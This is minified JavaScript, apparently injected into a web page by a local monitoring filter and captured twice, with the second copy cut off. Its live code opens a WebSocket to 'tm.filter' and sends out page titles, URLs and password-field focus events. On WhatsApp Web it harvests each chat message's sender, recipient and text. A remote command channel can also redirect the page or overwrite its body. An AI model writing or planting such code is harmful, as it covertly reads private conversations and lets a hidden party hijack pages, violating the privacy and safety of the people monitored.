 &#xD; &#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"&lt;unnamed&gt;";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e&lt;Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)&gt;1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=&gt;H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a&lt;s;a++)t=Y[a],!e.indexOf(t)&&t.length&gt;r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2&gt;D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7&gt;D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"5fb345bb-0f3f-4cb8-868b-142751b763f5",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"2020",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();&#xD; &#xD; &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:y.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:y.pid,pn:y.pn};null!=H&&H.readyState==WebSocket.OPEN&&H.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:y.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:y.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:y.pid,pn:y.pn};H.send(JSON.stringify(Y))}function s(){m()}function i(){n()&&(clearInterval(b),clearInterval(A)),timeout=setTimeout((function(){g()}),N)}function o(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();L!=e&&e&&v(),L=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!P)if(P=!0,n()){var e={type:"password_input_focus",focus:!0,token:y.token};H.send(JSON.stringify(e))}else window.top.postMessage({message:"iframePasswordInputFocused",name:Y.name,type:Y.type},"*")}function d(Y){var e=Y&&Y.name?Y.name:"&lt;unnamed&gt;";if(Y&&"password"==Y.type&&P)if(P=!1,n()){var t={type:"password_input_focus",focus:!1,token:y.token};H.send(JSON.stringify(t))}else window.top.postMessage({message:"iframePasswordInputBlurred",name:e,type:Y.type},"*")}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let s=Y[t];var n="password"==s.type,r=n&&s.hasAttribute("autofocus"),a=n&&e&&s.isEqualNode(e);(r||a)&&u(s),s.tmInputEventListenerAttached||(s.addEventListener("focus",(function(Y){u(Y.target)}),!0),s.addEventListener("blur",(function(Y){d(Y.target)}),!0),s.tmInputEventListenerAttached=!0)}}function D(){c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.addEventListener("beforeunload",(function(Y){d(),function(){for(var Y=document.getElementsByTagName("input"),e=0;e&lt;Y.length;++e){let t=Y[e];t.removeEventListener("focus",u),t.removeEventListener("blur",d),delete t.tmInputEventListenerAttached}}()}))}function l(){n()&&(y.iup&&r(),h()&&(v(),m(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(w=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(E="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(E="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var s=t.attributes["data-pre-plain-text"].textContent,i=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](s);if(!i||6!=i.length)return;if(i[3]&&"pm"==i[3].toLowerCase()&&(i[1]=parseInt(i[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](i[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(i[4],O)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var s=Date.parse(n[a]);if(s&&!(Math.abs(r-s)&gt;1728e6))return new Date(s)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(i[1]),r.setMinutes(i[2]),a=i[5]}T.get(w)||T.set(w,C);var o=n?n.innerText:null;if(a&&o&&L){var M=(a+o+w+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(T.get(w).getTime()==r.getTime()?r.setMilliseconds(++k):(k=0,T.set(w,r)),!M||I.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:o,recipient:e?"Me":w,conversationId:w+"("+E+")"};H.send(JSON.stringify(u)),I.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),b=setInterval(a,y.sendNotificationsInterval),h()&&(A=setInterval(s,y.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=y.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,H.send(JSON.stringify(n))}(),y.dontTrackWebPasswords&&D())}function f(){document.tmfilter||(g(),O={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. 